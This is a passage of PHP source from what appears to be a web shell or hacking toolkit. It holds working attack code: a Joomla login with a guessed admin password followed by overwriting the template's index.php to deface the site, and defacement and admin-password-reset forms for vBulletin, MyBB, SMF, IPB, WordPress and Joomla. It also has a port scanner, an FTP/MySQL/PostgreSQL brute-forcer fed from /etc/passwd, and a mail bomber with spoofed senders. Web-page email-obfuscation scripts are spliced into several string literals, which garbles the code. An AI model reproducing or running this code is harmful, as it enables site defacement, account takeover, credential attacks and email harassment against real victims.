3679                     $buffer = curl_exec($ch);
3680                     
3681                     $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
3682                     
3683                     $url2=$site_url."/index.php";
3684                     $ch = curl_init();
3685                     curl_setopt($ch, CURLOPT_URL, $url2);
3686                     curl_setopt($ch, CURLOPT_POST, 1);
3687                     curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
3688                     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3689                     curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3690                     curl_setopt($ch, CURLOPT_HEADER, 0);
3691                     curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3692                     curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3693                     curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3694                     $buffer = curl_exec($ch);
3695                     
3696                     $pos = strpos($buffer,"com_config");
3697                     
3698                     if($pos === false)
3699                     {
3700                     echo("<br>[-] Login Error");
3701                     exit;
3702                     }
3703                     
3704                     $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
3705                     $ch = curl_init();
3706                     curl_setopt($ch, CURLOPT_URL, $url2);
3707                     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3708                     curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3709                     curl_setopt($ch, CURLOPT_HEADER, 0);
3710                     curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3711                     curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3712                     curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3713                     $buffer = curl_exec($ch);
3714                     
3715                     $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
3716                     
3717                     if(!$hidden2)
3718                     {
3719                     echo("<br>[-] index.php Not found in Theme Editor");
3720                     }
3721                     
3722                     $url2=$site_url."/index.php?option=com_templates&layout=edit";
3723                     $ch = curl_init();
3724                     curl_setopt($ch, CURLOPT_URL, $url2);
3725                     curl_setopt($ch, CURLOPT_POST, 1);
3726                     curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
3727                     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3728                     curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3729                     curl_setopt($ch, CURLOPT_HEADER, 0);
3730                     curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3731                     curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3732                     curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3733                     $buffer = curl_exec($ch);
3734                     
3735                     $pos = strpos($buffer,'<dd class="message message fade">');
3736                     if($pos === false)
3737                     {
3738                     echo("<center><font class=txt size=4><blink>Cannot Deface Joomla</blink></font></center>");
3739                     exit;
3740                     }
3741                     else
3742                     {
3743                     echo("<center><font size=4><blink>Joomla Defaced Successfully</blink></font></center>");
3744                     }
3745                     }
3746                     }
3747                     }
3748                     ?>
3749                     <center>
3750                     <font class="tblheads" size="4">Vbulletin Forum Index Changer</font>
3751                     <form action="<?php echo $self; ?>" method = "POST">
3752                     <table border = "1" width="50%" height="316" style="text-align: center;border-color:#333333;" align="center">
3753                     <tr>
3754                     <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3755                     <p>
3756                     Table Prefix : <input type="text" name="prefix" class="sbox"> (Optional)</td>
3757                     </p>
3758                     </tr>
3759                     <tr>
3760                     <td height="167" width="780"><p align="center">&nbsp;<textarea class="box" name="index" cols=53 rows=8>lol ! You Are Hacked !!!!</textarea><p align="center"><input type = "submit" class="but" value = "Hack VB" name="forumdeface"></td>
3761                     </tr>
3762                     </table>
3763                     </form>
3764                     
3765                     <font class="tblheads" size="4">MyBB Forum Index Changer</font>
3766                     <form action="<?php echo $self; ?>" method = "POST">
3767                     <table border = "1" width="50%" height="316" style="text-align: center;border-color:#333333;" align="center">
3768                     <tr>
3769                     <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3770                     <p>
3771                     Table Prefix : <input type="text" name="prefix" value="mybb_" class="sbox"> (Optional)</td>
3772                     </p>
3773                     </td>
3774                     </tr>
3775                     <tr>
3776                     <td height="167" width="780"><p align="center">&nbsp;<textarea class="box" name="index" cols=53 rows=8>lol ! You Are Hacked !!!!</textarea><p align="center"><input type = "submit" class="but" value = "Hack MyBB" name="forumdeface"></td>
3777                     </tr>
3778                     </table>
3779                     </form>
3780                     
3781                     <font class="tblheads" size="4">SMF Forum Index Changer</font>
3782                     <form action="<?php echo $self; ?>" method = "POST">
3783                     <input type="hidden" name="forum">
3784                     <input type="hidden" name="defaceforum">
3785                     <table border = "1" width="50%" height="316" style="text-align: center;border-color:#333333;" align="center">
3786                     <tr>
3787                     <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3788                     <p>
3789                     Table Prefix : <input type="text" name="prefix" value="smf_" class="sbox"> (Optional)</td>
3790                     </p>
3791                     </td>
3792                     </tr>
3793                     <tr>
3794                     <td height="105" width="780"><p align="center"><b>Head : </b><input class="sbox" type="text" name="head" size="20" value="Hacked">&nbsp; <b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1"></p><p align="center"><textarea name="index" rows="8" cols="53" class="box"><b>lol ! You Are Hacked !!!!</b></textarea></p><input type = "submit" class="but" value = "Hack SMF" name="forumdeface"></p></td>
3795                     
3796                     </tr>
3797                     </table>
3798                     </form>
3799                     
3800                     <font class="tblheads" size="4">IPB Forum Index Changer</font>
3801                     <form action="<?php echo $self; ?>" method = "POST">
3802                     <input type="hidden" name="forum">
3803                     <input type="hidden" name="defaceforum">
3804                     <table border = "1" width="50%" height="316" style="text-align: center;border-color:#333333;" align="center">
3805                     <tr>
3806                     <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20"></td>
3807                     </tr>
3808                     <tr>
3809                     <td height="167" width="780"><p align="center"><b>Head : </b><input class="sbox" type="text" name="head" size="20" value="Hacked">&nbsp; <b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1"></p><p align="center">&nbsp;<textarea class="box" name="index" cols=53 rows=8><b>lol ! You Are Hacked !!!!</b></textarea><p align="center"><input type = "submit" class="but" value = "Hack IPB" name="forumdeface"></td>
3810                     </tr>
3811                     </table>
3812                     </form>
3813                     
3814                     <font class="tblheads" size="4">Wordpress Index Changer</font>
3815                     <form action="<?php echo $self; ?>" method = "POST">
3816                     <input type="hidden" name="forum">
3817                     <input type="hidden" name="defaceforum">
3818                     <table border = "1" width="50%" height="316" style="text-align: center;border-color:#333333;" align="center">
3819                     <tr>
3820                     <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3821                     <p>
3822                     Table Prefix : <input type="text" name="prefix" value="wp_" class="sbox"> (Optional)</td>
3823                     </p>
3824                     </td>
3825                     </tr>
3826                     <tr>
3827                     <td height="105" width="780"><p align="center"><b>Head : </b><input class="sbox" type="text" name="head" size="20" value="Hacked">&nbsp; <b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">&nbsp;<label><input type="checkbox" name="all" value="All" checked="checked"> All</label><p align="center"><textarea class="box" name="index" rows="8" cols="53"><b>lol ! You Are Hacked !!!!</b></textarea></p>
3828                     <br><input type = "submit" class="but" value = "Hack wordpress" name="forumdeface"></td>
3829                     
3830                     </tr>
3831                     </table>
3832                     </form>
3833                     <font class="tblheads" size="4">Joomla Index Changer</font>
3834                     <form action="<?php echo $self; ?>" method = "POST">
3835                     <input type="hidden" name="forum">
3836                     <input type="hidden" name="defaceforum">
3837                     <table border = "1" width="50%" height="316" style="text-align: center;border-color:#333333;" align="center">
3838                     <tr>
3839                     <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3840                     <p>
3841                     Table Prefix : <input type="text" name="prefix" value="jos_" class="sbox"> (Optional)</td>
3842                     </p>
3843                     </td>
3844                     </tr>
3845                     <tr>
3846                     <td height="105" width="780"><p align="center"><b>Site Url : </b><input class="box" type="text" name="siteurl" width="80" value="http://site.com/administrator/"><p align="center"><textarea class="box" name="index" rows="8" cols="53"><b>lol ! You Are Hacked !!!!</b></textarea></p>
3847                     <br><input type = "submit" class="but" value = "Hack Joomla" name="forumdeface"></td>
3848                     
3849                     </tr>
3850                     </table>
3851                     </form>
3852                     </center>
3853                     <?php
3854                     }
3855                     else if(isset($_GET["passwordchange"]))
3856                     {
3857                     echo "<center>";
3858                     if(isset($_GET['changed']))
3859                     { ?><font class="txt"><blink>Password Changed Successfully</blink></font><br><br><?php }
3860                     else if(isset($_GET['cannotchange']))
3861                     { ?><blink>Cannot Change Password</blink><br><br> <?php } ?>
3862                     
3863                     <font class="tblheads" size="4">Vbulletin Forum Password Changer</font>
3864                     <form action="<?php echo $self; ?>" method = "POST">
3865                     <input type="hidden"  name="forums" value="vb">
3866                     <table border = "1" width="50%" height="246" style="text-align: center;border-color:#333333;" align="center">
3867                     <tr>
3868                     <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3869                     <p>
3870                     Table Prefix : <input type="text" name="prefix" class="sbox"> (Optional)</td>
3871                     </p>
3872                     </tr>
3873                     <tr>
3874                     <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3875                     </tr>
3876                     </table>
3877                     </form>
3878                     
3879                     <font class="tblheads" size="4">MyBB Forum Password Changer</font>
3880                     <form action="<?php echo $self; ?>" method = "POST" name="mybb">
3881                     <input type="hidden"  name="forums" value="mybb">
3882                     <table border = "1" width="50%" height="246" style="text-align: center;border-color:#333333;" align="center">
3883                     <tr>
3884                     <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3885                     <p>
3886                     Table Prefix : <input type="text" name="prefix" value="mybb_" class="sbox"> (Optional)</td>
3887                     </p>
3888                     </tr>
3889                     <tr>
3890                     <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3891                     </tr>
3892                     </table>
3893                     </form>
3894                     
3895                     <font class="tblheads" size="4">SMF Forum Password Changer</font>
3896                     <form action="<?php echo $self; ?>" method = "POST" name="smf">
3897                     <input type="hidden"  name="forums" value="smf">
3898                     <table border = "1" width="50%" height="246" style="text-align: center;border-color:#333333;" align="center">
3899                     <tr>
3900                     <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3901                     <p>
3902                     Table Prefix : <input type="text" name="prefix" value="smf_" class="sbox"> (Optional)</td>
3903                     </p>
3904                     </tr>
3905                     <tr>
3906                     <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3907                     </tr>
3908                     </table>
3909                     </form>
3910                     
3911                     <font class="tblheads" size="4">Phpbb Forum Password Changer</font>
3912                     <form action="<?php echo $self; ?>" method = "POST">
3913                     <input type="hidden"  name="forums" value="phpbb">
3914                     <table border = "1" width="50%" height="246" style="text-align: center;border-color:#333333;" align="center">
3915                     <tr>
3916                     <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3917                     <p>
3918                     Table Prefix : <input type="text" name="prefix" value="phpbb_" class="sbox"> (Optional)</td>
3919                     </p>
3920                     </tr>
3921                     <tr>
3922                     <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3923                     </tr>
3924                     </table>
3925                     </form>
3926                     
3927                     <font class="tblheads" size="4">IPB Forum Password Changer</font>
3928                     <form action="<?php echo $self; ?>" method = "POST" name="ipb">
3929                     <input type="hidden"  name="forums" value="ipb">
3930                     <table border = "1" width="50%" height="246" style="text-align: center;border-color:#333333;" align="center">
3931                     <tr>
3932                     <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3933                     <p>
3934                     Table Prefix : <input type="text" name="prefix" class="sbox"> (Optional)</td>
3935                     </p>
3936                     </tr>
3937                     <tr>
3938                     <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3939                     </tr>
3940                     </table>
3941                     </form>
3942                     
3943                     <a name="wordp" id="wordp">
3944                     <font class="tblheads" size="4">Wordpress Password Changer</font>
3945                     <form action="<?php echo $self; ?>" method = "POST" name="wp">
3946                     <input type="hidden"  name="forums" value="wp">
3947                     <a name="wordp" id="wordp">
3948                     <table border = "1" width="50%" height="246" style="text-align: center;border-color:#333333;" align="center">
3949                     <tr>
3950                     <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3951                     <p>
3952                     Table Prefix : <input type="text" name="prefix" value="wp_" class="sbox"> (Optional)</td>
3953                     </p>
3954                     </tr>
3955                     <tr>
3956                     <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1"></p><p><b>New Username :</b> <input class="sbox" type="text" name="uname" size="20" value="admin">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3957                     </tr>
3958                     </table>
3959                     </form>
3960                     
3961                     <div name="jooml" id="jooml">
3962                     <font class="tblheads" size="4">Joomla Password Changer</font>
3963                     <form action="<?php echo $self; ?>" method = "POST">
3964                     <input type="hidden"  name="forums" value="joomla">
3965                     <table border = "1" width="50%" height="246" style="text-align: center;border-color:#333333;" align="center">
3966                     <tr>
3967                     <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3968                     <p>
3969                     Table Prefix : <input type="text" name="prefix" value="jos_" class="sbox"> (Optional)</td>
3970                     </p>
3971                     </tr>
3972                     <tr>
3973                     <td height="70" width="780"><p align="center"><b>New Username :</b> <input class="sbox" type="text" name="uname" size="20" value="admin">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3974                     </tr>
3975                     </table>
3976                     </form>
3977                     <?php
3978                     if(isset($_GET['changed']))
3979                     { ?><font size="3"><blink>Password Changed Successfully</blink></font><br><br><?php }
3980                     else if(isset($_GET['cannotchange']))
3981                     { ?><font class=txt size="3"><blink>Cannot Change Password</blink></font><br><br> <?php } ?>
3982                     </center>
3983                     <?php
3984                     }
3985                     }
3986                     
3987                     
3988                     // Mail
3989                     
3990                     else if(isset($_GET['tools']))
3991                     {
3992                     
3993                     ?>
3994                     <center>
3995                     <table cellpadding="5" border="2" style="width:50%;">
3996                     <tr>
3997                     <td colspan="2" align="center"><b>Port Scanner<br></b></td>
3998                     </tr>
3999                     <tr>
4000                     <td align="center">
4001                     <form name='scanner' method='post'>
4002                     <input class="sbox" type='text' name='host' value='<?php echo $_SERVER["SERVER_ADDR"]; ?>' >
4003                     </td>
4004                     <td align="center">
4005                     <select class="sbox" name='protocol'>
4006                     <option value='tcp'>tcp</option>
4007                     <option value='udp'>udp</option>
4008                     </select>
4009                     </td>
4010                     <tr>
4011                     <td colspan="2" align="center"><input class="but" type='submit' value='Scan Ports'></td>
4012                     </tr>
4013                     </form>
4014                     
4015                     <?php
4016                     if(isset($_POST['host']) && isset($_POST['protocol']))
4017                     {
4018                     echo "<tr><td colspan=2><font size='3' face='Verdana'>Open Ports: ";
4019                     $host = $_POST['host'];
4020                     $proto = $_POST['protocol'];
4021                     $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
4022                     for($current = 0; $current <= 23; $current++)
4023                     {
4024                     $currents = $myports[$current];
4025                     $service = getservbyport($currents, $proto);
4026                     // Try to connect to port
4027                     $result = fsockopen($host, $currents, $errno, $errstr, 1);
4028                     // Show results
4029                     if($result)
4030                     {
4031                     echo "<font class=txt size=3>$currents, </font>";
4032                     }
4033                     }
4034                     }
4035                     echo "</td></tr></table>";
4036                     ?>
4037                     <br>
4038                     <form action="<?php echo $self; ?>" method="get">
4039                     <input type="hidden" name="tools">
4040                     <table cellpadding="5" border="2" style="width:50%;">
4041                     <tr>
4042                     <td colspan="2" align="center"><font size="4">BruteForce</font></td>
4043                     </tr>
4044                     <tr>
4045                     <td>Type : </td>
4046                     <td>
4047                     <select name="prototype" class="sbox">
4048                     <option value="ftp">FTP</option>
4049                     <option value="mysql">MYSQL</option>
4050                     <option value="postgresql">PostgreSql</option>
4051                     </select>
4052                     </td>
4053                     </tr>
4054                     <tr>
4055                     <td>Server <b>:</b> Port : </td>
4056                     <td><input type="text" name="serverport" value="<?php echo $_SERVER["SERVER_ADDR"]; ?>" class="sbox"></td>
4057                     </tr>
4058                     <tr>
4059                     <td valign="middle">Brute type : </td>
4060                     <td><label><input type=radio name=type value="1" checked> /etc/passwd</label><label><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label><hr>
4061                     <input type=radio name=type value="2"> Dictionary</label><br>
4062                     Login : &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="text" name="login" value="root" class="sbox"><br>
4063                     Dictionary : <input type="text" name="dict" value="<?php echo getcwd() . $directorysperator; ?>passwd.txt" class="sbox">
4064                     </td>
4065                     </tr>
4066                     <tr>
4067                     <td colspan="2" align="center"><input type="submit" value="Attack >>" class="but"></td>
4068                     </tr>
4069                     </form>
4070                     
4071                     <?php
4072                     if(isset($_GET['prototype']))
4073                     {
4074                     echo '<tr><td colspan=2><h1>Results</h1><div><span>Type:</span> '.htmlspecialchars($_GET['prototype']).' <span><br>Server:</span> '.htmlspecialchars($_GET['serverport']).'<br>';
4075                     if( $_GET['prototype'] == 'ftp' )
4076                     {
4077                     function BruteFun($ip,$port,$login,$pass)
4078                     {
4079                     $fp = @ftp_connect($ip, $port?$port:21);
4080                     if(!$fp) return false;
4081                     $res = @ftp_login($fp, $login, $pass);
4082                     @ftp_close($fp);
4083                     return $res;
4084                     }
4085                     }
4086                     elseif( $_GET['prototype'] == 'mysql' )
4087                     {
4088                     function BruteFun($ip,$port,$login,$pass)
4089                     {
4090                     $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
4091                     @mysql_close($res);
4092                     return $res;
4093                     }
4094                     }
4095                     elseif( $_GET['prototype'] == 'pgsql' )
4096                     {
4097                     function BruteFun($ip,$port,$login,$pass)
4098                     {
4099                     $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
4100                     $res = @pg_connect($str);
4101                     @pg_close($res);
4102                     return $res;
4103                     }
4104                     }
4105                     
4106                     $success = 0;
4107                     $attempts = 0;
4108                     $server = explode(":", $_GET['server']);
4109                     if($_GET['type'] == 1)
4110                     {
4111                     $temp = @file('/etc/passwd');
4112                     if( is_array($temp))
4113                     foreach($temp as $line)
4114                     {
4115                     $line = explode(":", $line);
4116                     ++$attempts;
4117                     if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) )
4118                     {
4119                     $success++;
4120                     echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
4121                     }
4122                     if(@$_GET['reverse'])
4123                     {
4124                     $tmp = "";
4125                     for($i=strlen($line[0])-1; $i>=0; --$i)
4126                     $tmp .= $line[0][$i];
4127                     ++$attempts;
4128                     if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) )
4129                     {
4130                     $success++;
4131                     echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
4132                     }
4133                     }
4134                     }
4135                     }
4136                     elseif($_GET['type'] == 2)
4137                     {
4138                     $temp = @file($_GET['dict']);
4139                     if( is_array($temp) )
4140                     foreach($temp as $line)
4141                     {
4142                     $line = trim($line);
4143                     ++$attempts;
4144                     if(BruteFun($server[0],@$server[1], $_GET['login'], $line) )
4145                     {
4146                     $success++;
4147                     echo '<b>'.htmlspecialchars($_GET['login']).'</b>:'.htmlspecialchars($line).'<br>';
4148                     }
4149                     }
4150                     }
4151                     echo "<span>Attempts:</span> <font class=txt>$attempts</font> <span>Success:</span> <font class=txt>$success</font></div></td></tr>";
4152                     }
4153                     ?>
4154                     
4155                     </table>
4156                     </center><br>
4157                     <?php
4158                     }
4159                     
4160                     
4161                     // Mail
4162                     
4163                     else if(isset($_GET['mailbomb']))
4164                     { ?>
4165                     <center><table><tr><td><a href="<?php echo $self; ?>?bomb&mailbomb"><font size="4">| Mail Bomber |</font></a></td><td><a href="<?php echo $self; ?>?mail&mailbomb"><font size="4">| Mass Mailer |</font></a></td></tr></table></center><br>
4166                     <?php
4167                     if(isset($_GET['bomb']))
4168                     {
4169                     if(
4170                     isset($_GET['to']) &&
4171                     isset($_GET['subject']) &&
4172                     isset($_GET['message']) &&
4173                     isset($_GET['times']) &&
4174                     $_GET['to'] != '' &&
4175                     $_GET['subject'] != '' &&
4176                     $_GET['message'] != '' &&
4177                     $_GET['times'] != ''
4178                     )
4179                     {
4180                     $times = $_GET['times'];
4181                     while($times--)
4182                     {
4183                     if(isset($_GET['padding']))
4184                     {
4185                     $fromPadd = rand(0,9999);
4186                     $subjectPadd = " -- ID : ".rand(0,9999999);
4187                     $messagePadd = "
4188                     
4189                     ------------------------------
4190                     ".rand(0,99999999);
4191                     
4192                     }
4193                     $from = "president$fromPadd@whitehouse.gov
4194 /* <![CDATA[ */
4195 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
4196 /* ]]> */
4197 ";
4198                     if(!mail($_GET['to'],$_GET['subject'].$subjectPadd,$_GET['message'].$messagePadd,"From:".$from))
4199                     {
4200                     $error = 1;
4201                     echo "<center><font size=3><blink><blink>Some Error Occured!</blink></font></center>";
4202                     break;
4203                     }
4204                     }
4205                     if($error != 1)
4206                     {
4207                     echo "<center><font class=txt size=3><blink>Mail(s) Sent!</blink></font></center>";
4208                     }
4209                     }
4210                     else
4211                     {
4212                     ?>
4213                     <form method="GET">
4214                     <input type="hidden" name="bomb" />
4215                     <input type="hidden" name="mailbomb" />
4216                     <table id="margins" style="width:100%;">
4217                     <tr>
4218                     <td style="width:30%;">
4219                     To
4220                     </td>
4221                     <td>
4222                     <input class="box" name="to" value="victim@domain.com
4223 /* <![CDATA[ */
4224 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
4225 /* ]]> */
4226 ,victim2@domain.com
4227 /* <![CDATA[ */
4228 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
4229 /* ]]> */
4230 " onFocus="if(this.value == 'victim@domain.com
4231 /* <![CDATA[ */
4232 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
4233 /* ]]> */
4234 ,victim2@domain.com
4235 /* <![CDATA[ */
4236 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
4237 /* ]]> */
4238 ')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com
4239 /* <![CDATA[ */
4240 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
4241 /* ]]> */
4242 ,victim2@domain.com
4243 /* <![CDATA[ */
